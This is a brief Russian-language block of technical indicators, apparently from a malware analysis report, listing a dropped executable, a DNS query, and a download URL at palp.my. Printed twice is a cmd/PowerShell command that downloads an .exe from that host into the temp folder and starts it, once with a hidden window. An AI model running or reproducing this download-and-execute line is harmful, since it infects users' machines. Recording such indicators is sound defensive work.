Техническая информация
- http://palp.my/system/logs/json/ как %temp%\zzdsafjaka.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://palp.my/system/logs/json/','%TMP%\ZzDSAfjaka.exe');Start-Process '%TMP%\ZzDSAfjaka.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1924
- %TEMP%\949609.cvr
- DNS ASK pa#p.my
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://palp.my/system/logs/json/','%TMP%\ZzDSAfjaka.exe');Start-Process '%TMP%\ZzDSAfjaka.exe';' (со скрытым окном)